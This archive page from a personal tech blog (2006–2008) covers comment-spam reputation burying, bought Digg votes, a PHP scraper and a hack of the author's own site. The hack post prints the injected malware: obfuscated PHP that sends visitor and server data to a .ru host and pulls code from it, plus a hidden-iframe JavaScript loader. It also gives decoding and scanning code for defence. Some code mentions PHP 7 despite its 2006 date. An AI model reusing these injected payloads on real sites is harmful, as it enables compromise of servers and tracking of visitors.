Archive for the 'Blog' Category

Sweeping Bad Press Under The Rug Using Junk Blog Comments

Tuesday, February 12th, 2008

I noticed an interesting comment on this blog while deleting comment spam a few days ago.

1. Jim Mirkalami Says:
February 6th, 2008 at 6:25 pm

I have been a frequent visitor of this blog for some time now, so I thought it would be a good idea to leave you with my thanks.

Regards,
Jim Mirkalami

It has that “almost certainly spam but hard to be dead sure” feel that a lot of spam comments have. Strangely, although the website field is optional, he gives yahoo.com as his website. That seems even stranger when you note that he appears to have his own website (jimmirkalami.com), unless there are two single fathers of two with that name in Ontario.

It seems like a pretty uncommon name, so I googled him. The first few links are news stories alleging questionable ethics in Canadian auctions for jewelry and Persian rugs. Curiouser and curiouser.

Of course, I am only guessing that it is an uncommon name. It could be the equivalent of Smith in the Middle East. It certainly seems fairly popular among Toronto rug merchants.

Here is my theory.

I’d be upset if the first Google result for my (fairly uncommon) name led to a page that started “No charges laid …”.

Knowing a little about SEO and the way Google ranks pages, I think you could fairly quickly bury those stories by commenting on a lot of blogs. It would be harder if the story was all over major media. Not many blogs have a pagerank that can compete with CNN or the NYT (pagerank 9), but Google ranks local media about on par with a popular blog. There is no shortage of blogs with a pagerank around 5 or 6. Google only gives canada.com a 7.

The comments appear to be somewhat targeted. They seem to appear on blogs (but not always posts) that mention the word ‘auction’ or the word ‘Canada’. There are automated comment spam tools that will find suitable blogs for you, or with a little more time you could do it by hand from any of the blog search engines. A few days later he commented on another post of mine that does contain the word auction (because it is about eBay).

The text of that comment is:

Jim Mirkalami Says:
February 8th, 2008 at 3:13 pm

I have been visiting this site a lot lately, so i thought it is a good idea to show my appreciation with a comment.

Thanks,
Jim Mirkalami

PS: I am a single dad! ;)

Other ones you will see around the place are:

Tammy kingston, on February 5th, 2008 at 5:18 pm Said:

Jim Mirkalami, the very globally highly regarded auctioneer, is a peaceful man single father of two beautiful children. He is also a regular reader of this blog. Great job you ppl!

Aslan, on February 7th, 2008 at 10:06 pm Said:

He is a kind and very loving man.

I don’t know who Tammy is. I get no useful search results for “Tammy Mirkalami”, but I am guessing she is from Kingston (which is near Toronto). I am guessing the Aslan above is more likely to be Aslan Mirkalami (owner of rugman.com) than a lion king from Narnia.

Does this variety of reputation management work? Sure does. A few days later, at least the top 10 pages of search results for his name are all blogs. The negative press is presumably still indexed, but has dropped way down the list where only a dedicated searcher will find it. He may have overplayed his hand though, as the first result at the moment is a blogger calling him a spammer.

So here are some morals to this story.

  • If you are going to have dissatisfied customers, make sure you have few enough that only local media cover the allegations.
  • Commenting furiously on blogs will give you Google results that effectively act as noise.
  • Try to tailor the comments to the blogs a little. It would not take much more time, and would make the effort invisible.

Oh, and surely you already knew that whenever you buy anything (including rugs and jewelry), valuations from the seller are worth only slightly more than the paper your blog is written on.

Digg’s Kevin Rose Has an Account on User/Submitter?

Saturday, March 3rd, 2007

If you missed it, User/Submitter is a paid service allowing people to buy diggs.

They are very upfront about their business model. Submitters (people who want stories promoted) pay $20 plus $1 per digg. Users (digg users whose second job as a WoW gold farmer is getting tedious) get paid about 17c per digg. So buying 100 diggs costs $120, and in theory nearly $17 of that gets paid out to diggers. In practice there is a $20 payout minimum, so it seems unlikely that many people will diligently dig away and make the 120 or so paid diggs needed before their account gets noticed and shut off. In either case, it is a nice profit margin while they can get away with it.
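
To make the arithmetic concrete, here is a minimal sketch in JavaScript. The prices are the figures quoted above; the function and constant names are made up for illustration, and the 17c payout is only the approximate figure, so treat the results as rough.

```javascript
// All amounts are in cents to avoid floating point rounding.
const SETUP_FEE = 2000;      // $20 flat fee per submission
const PRICE_PER_DIGG = 100;  // $1 charged to the submitter per digg
const PAYOUT_PER_DIGG = 17;  // roughly 17c paid to the digger (approximate)
const PAYOUT_MINIMUM = 2000; // $20 minimum before a digger can cash out

// What a submitter pays for a given number of diggs.
function submitterCost(diggs) {
  return SETUP_FEE + diggs * PRICE_PER_DIGG;
}

// The most that could be paid out to diggers for those diggs.
function maxPayout(diggs) {
  return diggs * PAYOUT_PER_DIGG;
}

// How many paid diggs one account needs before reaching the payout minimum.
function diggsToReachMinimum() {
  return Math.ceil(PAYOUT_MINIMUM / PAYOUT_PER_DIGG);
}

// Format a cent amount as dollars for display.
const dollars = (cents) => '$' + (cents / 100).toFixed(2);

console.log(dollars(submitterCost(100)));                  // cost of 100 diggs
console.log(dollars(maxPayout(100)));                      // paid out at most
console.log(dollars(submitterCost(100) - maxPayout(100))); // kept by the service
console.log(diggsToReachMinimum());                        // diggs before first payout
```

At exactly 17c a digg, an account needs 118 paid diggs before its first payout, which is close to the 120 mentioned above.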

Digg unsurprisingly don’t seem to be fans. Poking around, I can see accounts are being disabled. One of mine got disabled, but that might be a bad example because I was not very subtle. Commenting on stories that I dugg that I had dugg them for 17c is probably more blatant than most. Result:
disabled

Looking at other accounts with suspicious behaviour, though, I see a few of these:
invalid

Privacy is not particularly well guarded at User/Submitter. If you want to know if a digg user name is registered there, then try to register it. An interesting username to try is kevinrose.

Kevin Rose On User/Submitter

Of course, the experiment is somewhat flawed. You can only check once, and while a negative result is definitive, a positive result might just mean that somebody else performed the same experiment before you. Rumours of Digg’s demise might be popular, but I don’t think Kevin yet needs a side job paying 17c per click.

Suspicious behaviour, though, is not hard to find. Here is a list of Digg stories that received paid diggs in the last few hours.
http://digg.com/videos/people/Backflipping_Midget_Chased_by_Cops
http://digg.com/offbeat_news/Russian_wrestling_gone_amazing
http://digg.com/gadgets/The_ULTIMATE_domain_search_tool
http://digg.com/world_news/Photo_essay_Unexploded_bombs_are_everywhere_in_Iraq
http://digg.com/tech_news/Lenovo_Recalls_209_000_Notebook_Batteries
http://digg.com/2008_us_elections/Who_Else_Wants_to_Bash_Bush_Now
http://digg.com/videos/educational/Blind_Turkish_Book_Reviewer_The_Alchemist
http://digg.com/gadgets/Nikon_D40_Review_Good_Camera_at_a_Great_Value

Unsurprisingly, there are a number of the same users digging many of them.

What a social site should do about abuse is a harder problem. Any competitive environment is bound to get people gaming or abusing the system. I am not sure that disabling accounts is the best solution though. If I were a third-world subsistence gold farmer sitting in an internet cafe clicking links for a few cents a time and my account got disabled, I would just create a new one, which would then need to be detected and disabled in turn. If my account were instead silently flagged as a source of worthless diggs and simply ignored in calculations, I would merrily continue clicking away. Over time nearly all bought diggs would become worthless, because the money would mostly be paid out to accounts that have already been detected.

Publicly disabling accounts is good for maintaining the appearance of transparency, but longer term, allowing abusive users individual sandboxes to play in lets them waste time without affecting others. In a system where reregistering under another alias is painless, disabling accounts is not a very effective deterrent.
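
The silent-flagging idea is simple enough to sketch. This is only an illustration in JavaScript and says nothing about how Digg actually counts votes: the data shapes and the names `countEffectiveDiggs` and `flaggedUsers` are invented for the example.

```javascript
// Hypothetical sketch: flagged accounts can keep digging, but their
// diggs are left out of the score that decides promotion.
function countEffectiveDiggs(diggs, flaggedUsers) {
  // diggs: array of { user, story }; flaggedUsers: Set of user names
  const scores = new Map();
  for (const { user, story } of diggs) {
    if (flaggedUsers.has(user)) {
      continue; // silently ignored; the user sees nothing unusual
    }
    scores.set(story, (scores.get(story) || 0) + 1);
  }
  return scores;
}

const flaggedUsers = new Set(['paid_clicker_1', 'paid_clicker_2']);
const diggs = [
  { user: 'alice', story: 'story-a' },
  { user: 'paid_clicker_1', story: 'story-b' },
  { user: 'paid_clicker_2', story: 'story-b' },
  { user: 'bob', story: 'story-b' },
];

const scores = countEffectiveDiggs(diggs, flaggedUsers);
console.log(scores.get('story-a')); // 1
console.log(scores.get('story-b')); // 1, the two paid diggs do not count
```

The flagged accounts never receive an error, so there is no signal telling their owners to register again under a new name.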

OfficePirates.com - Calling all slackers

Wednesday, March 1st, 2006

OfficePirates.com is an interesting venture*. They are aimed specifically at the 21-34 year old, male, office worker who hates his job and spends more time surfing the web than working demographic. Did you know that was a demographic? Now I will admit it is not quite like one of those job ads you sometimes read that say “To be considered, the applicant should have between 4.3 and 4.32 years C++ experience, like french fry sandwiches and be named Bob,” but it still seems fairly specific to me.

Of course, in time-honoured Web 2.0 style, viral marketing is a big part of the plan. Their hordes of office slackers are, as we speak, supposed to be emailing each other to say “Have you seen the Girls in Bras video? It is hilarious.”

There are a few small problems with the plan though: the video is not hilarious, and the people behind it seem to have only a passing familiarity with some standard internet practices. For example, the comment field in their blog looks like this whenever I look at it:

Closed?

Did you use to think the internet operated 24 hours a day? So did I. I am not even sure what time zone that 9-6 is in, but apparently there is only one.

Some of their stuff is quite good. I liked Half day man, and they have money and a marketing budget behind them so being initially a bit thin on content will presumably be easy to solve, but it is hard to run a major website when you don’t seem to understand the genre conventions and when parts of your technology suck. I hate the Flash video player they are using. It does not cache content, so if your connection struggles you can’t pause and wait for the download to catch up. You just have to watch it stutter.

I also keep seeing [an error occurred while processing this directive]. What is that? A server-side include error message, or an error message from an early version of ASP? How very Web 1.0.

* and I am not only saying that because I own lots of their stock on Alexadex, or because they have a really cool logo

Update: OfficePirates.com was shut down on September 1 after failing to find an audience. Personally, I only noticed six months later because I had a broken link.

Fun with Alexadex

Monday, February 27th, 2006

In case you are not aware, Alexadex is a virtual stock market game, where the values of stocks depend on their Alexa reach ratings.

Because I have too much time on my hands, I wanted to track my portfolio value in the sidebar of my blog. Look over there somewhere ---> and you will probably see it.

In case it holds amusement value to somebody, here is the code. It relies on PHP and MySQL and just does some simple screen scraping.

The fact that this URL works:
http://alexadex.com/ad/api?&method=getQuote&url=lukewelling.com
hints that there might be an API to do this at some point, but for now, I am screen scraping. (URL pulled from Cal Evans’ blog)

The database table looks like this:

CREATE TABLE alexadex (
  `timestamp` TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP,
  value INT NOT NULL DEFAULT 0,
  PRIMARY KEY (`timestamp`)
);

From a cron job I am running:

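<?php
require('functions.php');

connectToDb();

$username = 'tangledweb';
$url = "http://alexadex.com/ad/user/$username";
// Text that immediately precedes the portfolio total in the page HTML
$marker = 'total:</b></td><td align=right>$';

$current = scrape($url, $marker);
if ($current !== false)
{
   // Only store a value when the scrape actually found one
   storeCurrent($current);
   echo "stored: $current";
}
else
{
   echo "scrape failed";
}

?>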


In case it is not obvious, my Alexadex username is tangledweb.

In my blog sidebar I have:

<?php
require('functions.php');
$temp = getMostRecentFromDb();
// Only print the list item if a value has been stored
if ($temp)
{
  echo '<li><a href="http://alexadex.com/ad/user/tangledweb"
        >My current portfolio is $';
  echo number_format($temp['value']).'</a></li>';
}
?>

The functions these rely on are:

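<?php
// functions.php: helpers shared by the cron job and the sidebar.
// Uses mysqli, because the old mysql_* functions were removed in PHP 7.

// Store one portfolio value, timestamped with the current time.
function storeCurrent($value)
{
  $value = intval($value);   // also makes the value safe to embed in SQL
  $sql = "INSERT
          INTO alexadex (`timestamp`, value)
          VALUES (NOW(), $value)";
  return mysqli_query(connectToDb(), $sql);
}

// Fetch the most recently stored row, or false if there is none.
function getMostRecentFromDb()
{
  $sql = "SELECT *
          FROM alexadex
          ORDER BY `timestamp` DESC
          LIMIT 1";

  $result = mysqli_query(connectToDb(), $sql);
  if($result === false)
  {
    return false;
  }
  $row = mysqli_fetch_assoc($result);
  return $row ? $row : false;
}

// Fetch $url and return the integer that follows $marker, or false on failure.
function scrape($url, $marker, $maxLength = 50)
{
  $page = file_get_contents($url);
  if($page === false)
  {
    return false;
  }
  $pos = strpos($page, $marker);
  if($pos === false)
  {
    return false;
  }
  // Take the text after the marker, drop thousands separators, keep the number
  $value = substr($page, $pos + strlen($marker), $maxLength);
  $value = str_replace(',', '', $value);
  $value = intval($value);
  return $value;
}

// Open the database connection on first use and reuse it afterwards.
function connectToDb()
{
  static $connection = null;
  if($connection === null)
  {
    $connection = mysqli_connect("host", "user", "pass", "dbname");
  }
  return $connection;
}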

This code comes with no warranty of any kind. You can have it as public domain, but I would appreciate a link to this blog if you use it. I hope it still works. WordPress seems to really, really want to mess with it when it saves it.

Spyware and popups close to home

Monday, February 27th, 2006

It seems somebody, somewhere has a fine sense of irony. A few days ago I posted about a sleazy popup advertising vendor. Then on Sunday morning I looked at my blog to find that it had been altered and code had been inserted in numerous places to force downloads of a (presumably corrupt) WMF file from a website with a .ru extension.

My web host was really, really, remarkably useless, so I am a bit short on details. I think the most likely situation is that an automated script running somewhere on the shared web host was spidering from account to account and inserting its payload into files with .php or .html extensions wherever it found one writable by the webserver user.

There are a few obvious morals to this story.

  • There are scripts in the wild that target PHP sites on shared hosts. Be careful with yours.
  • Have as few files as possible writable by the webserver user on a shared host. I am sure you already knew this, but it can be hard because,
  • Writers of web apps such as forums and blogs require you to have some files and directories writable, so if you are choosing such software for a shared host, see if you can find software that requires as few writable files as possible, and
  • No matter how low your expectations are for the quality of support you expect from a crappy <$10 per month web host, it is always possible for those expectations to be exceeded.

If you have rarely checked stuff sitting on a shared host, it would be worth grepping it for some distinctive code from the samples below (perhaps “error_reporting(0)”) to make sure you are not in the same boat.
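
If you would rather script the check than run grep by hand, something like the following would do. It is a rough sketch for Node.js, not a real malware scanner: the marker list contains only strings taken from the samples in this post, and the function names and file extensions checked are my own choices.

```javascript
const fs = require('fs');
const path = require('path');

// Strings that appear in the injected code shown in this post; extend as needed.
const MARKERS = ['error_reporting(0)', 'dXNlcjcucGhwaW5jbHVkZS5ydQ=='];
const EXTENSIONS = ['.php', '.html'];

// Return the 1-based line numbers in `text` that contain any marker.
function findMarkerLines(text, markers = MARKERS) {
  const hits = [];
  text.split('\n').forEach((line, index) => {
    if (markers.some((marker) => line.includes(marker))) {
      hits.push(index + 1);
    }
  });
  return hits;
}

// Walk `dir` recursively and report matching .php and .html files.
function scanTree(dir) {
  const report = [];
  for (const entry of fs.readdirSync(dir, { withFileTypes: true })) {
    const fullPath = path.join(dir, entry.name);
    if (entry.isDirectory()) {
      report.push(...scanTree(fullPath));
    } else if (EXTENSIONS.includes(path.extname(entry.name))) {
      const lines = findMarkerLines(fs.readFileSync(fullPath, 'utf8'));
      if (lines.length > 0) {
        report.push({ file: fullPath, lines });
      }
    }
  }
  return report;
}

// Usage: node scan.js /path/to/webroot
const root = process.argv[2];
if (root) {
  for (const { file, lines } of scanTree(root)) {
    console.log(`${file}: lines ${lines.join(', ')}`);
  }
}
```

Plenty of legitimate code calls error_reporting(0) too, so a hit is a reason to look at the file, not proof that it has been tampered with.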

The whole situation of course serves to make Aussie Hero Dale Begg-Smith all the more lovable in my eyes. For anybody who does not understand why people hate this sort of business practice and the arseclowns that practice it, it is because they make their money at the expense of wasting other people’s time. I spent half of my Sunday cleaning up this mess, and still have a few more domains to fix now (Monday night).

In case anybody is curious, the code generally looked like this:

error_reporting(0);
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".
base64_encode($g).".".base64_encode($h).".".base64_encode($n);
if((include_once(base64_decode("aHR0cDovLw==").
base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str)))
{}
else {
include_once(base64_decode("aHR0cDovLw==").
base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str);}

or


<script language="javascript" type="text/javascript">
var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@ %kwws=22xvhu4<1liudph1ux2Bv@4%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@ 4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';
while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}

which, de-obfuscated, is:
<div style="visibility: hidden; position: absolute; left: 1; top: 1"><iframe
src="http://user19.iframe.ru/?s=1" frameborder=0 vspace=0 hspace=0 width=1 height=1
marginwidth=0 marginheight=0 scrolling=no></iframe></div>
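
Both snippets hide their target behind trivially reversible encodings: the PHP one base64-encodes the address it includes, and the JavaScript one adds 3 to every character code. Here is a minimal sketch for undoing each, assuming Node.js (for `Buffer`). The function names are made up for illustration, and the inputs are short excerpts copied from the code above.

```javascript
// Undo the "add 3 to every character code" obfuscation used by the script.
function shiftDecode(text, offset = 3) {
  let out = '';
  for (let i = 0; i < text.length; i++) {
    out += String.fromCharCode(text.charCodeAt(i) - offset);
  }
  return out;
}

// Decode a base64 string (Node.js; a browser could use atob instead).
function fromBase64(encoded) {
  return Buffer.from(encoded, 'base64').toString('utf8');
}

// Excerpt of the obfuscated string from the script.
console.log(shiftDecode('kwws=22xvhu4<1liudph1ux2Bv@4'));
// → http://user19.iframe.ru/?s=1

// The two base64 strings from the PHP snippet, joined the way the code joins them.
console.log(fromBase64('aHR0cDovLw==') + fromBase64('dXNlcjcucGhwaW5jbHVkZS5ydQ=='));
// → http://user7.phpinclude.ru
```

Decoding to plain text like this is safe; do not load the resulting addresses in a browser.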

In one file I also found:

<a href = "http://mrsnebraskaamerica.com/catalog/images/sierra/hackmai-2.0.shtml" class=giepoaytr title="hackmai 2.0">hackmai 2.0</a>

There were also assorted files with generic-sounding names created, like date.php and report.php, and .htaccess files created or appended to in order to direct 404s to the new bogus files.

Blog measurement

Thursday, February 9th, 2006

Statistics about blogs are all the rage at the moment.

Steve Rubel says it is time that we had standards so trends can be gauged and advertisers can be appropriately gouged. He is right, but his evidence for the existence of a problem is flawed.

He complains that a study in November 2004 put readership at 58% while a different, more recent study put it at 20%.

Actually, the BBC 2004 report says readership is up by 58%, taking it to 27% of online Americans. The article says 120 million Americans were online in 2004, which is about 40% of the population. That means the study was saying about 11% of the population had read a blog (27% of 40%).

Even without measurement standards, the increase from 11% “have read a blog” to 20% who read blogs “frequently” or at least “occasionally” seems fairly consistent and believable over the space of a year or so.
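
The sum is quick to check. This is a throwaway calculation in JavaScript that uses only the figures quoted above; the variable names are mine.

```javascript
const onlineAmericansMillions = 120; // online in 2004, per the article
const onlineShareOfPopulation = 40;  // percent of the population that was online
const readersShareOfOnline = 27;     // percent of online Americans reading blogs

// Implied total population and number of blog readers, in millions.
const populationMillions = onlineAmericansMillions * 100 / onlineShareOfPopulation;
const readersMillions = onlineAmericansMillions * readersShareOfOnline / 100;

// Blog readers as a percentage of the whole population.
const readersShareOfPopulation = readersMillions / populationMillions * 100;

console.log(populationMillions);                  // 300
console.log(readersMillions);                     // 32.4
console.log(readersShareOfPopulation.toFixed(1)); // 10.8, i.e. about 11%
```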

One of the challenges for any sort of automated measuring is going to be spam detection. Here is an example of a real blog that has been left unattended for a while. Detecting pure link-farms seems to be a hard enough problem in search. Removing spam noise from a site that contains a mixture of real and spam comments has to be harder.

Can somebody explain read.io to me?

Wednesday, February 8th, 2006

Am I missing the point, or is it kind of … ummm … well, stupid?

It is not live yet, so I have not seen it and might be missing an important detail. As I understand it, you sign up and it takes entries from the feed of your blog and converts them into synthetic speech for others to download.

Here is a sample

I can see why that might be fun once, but except for your blind blog readers, I cannot see why it is a good thing. Even if you have a significant number of blind readers, they presumably already have screen reading software doing the conversion at the client end, where it should be done. Who would rather download a 5 MB MP3 file than a 5 KB HTML file?

I could kind of see some value in it if you could use it as an aggregator, grabbing new entries from a bunch of blogs that you read regularly and filling your MP3 player with them overnight so you could listen to them on the way to work. I still think the conversion should be done at the client end, but at least I could see a point to it. I don’t see why offering your readers the opportunity to download a stilted, machine converted podcast of your writings would have more than novelty value.

Every new internet technology can be used for vanity searches

Thursday, February 2nd, 2006

From Technorati: Blog posts that contain Luke Welling per day for the last 30 days.
Technorati Chart

Hello world!

Monday, January 30th, 2006

It has reached the point where nearly everybody I know has a blog. Some of the people I know even have pets with blogs, but that is what happens when you associate with nerds.

Of course 86% of the bloggers I know long ago got bored with updating their blogs, and left them lying around gathering dust.

Here, then, is my blog. It too stands about a 5/6 chance of getting abandoned.